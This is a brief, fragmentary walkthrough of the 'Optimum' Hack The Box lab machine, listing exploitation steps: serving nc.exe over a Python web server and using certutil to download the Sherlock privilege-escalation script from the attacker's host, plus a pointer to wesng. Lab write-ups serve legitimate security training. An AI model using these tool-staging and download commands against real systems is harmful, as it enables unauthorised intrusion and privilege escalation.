Optimum HTB

Enumeration

Exploitation

  • we can find it in /usr/share/windows-resources/binaries/nc.exe and paste it into our Downloads/optimum folder

  • python3 -m http.server 80 and host our current directory for the nc.exe file

  • Then we upload sherlock(https://github.com/rasta-mouse/Sherlock) using certutil -urlcache -f http://10.10.14.25/sherlock.ps1 sherlock.ps1

  • We can also use wesng(https://github.com/bitsadmin/wesng)

Last updated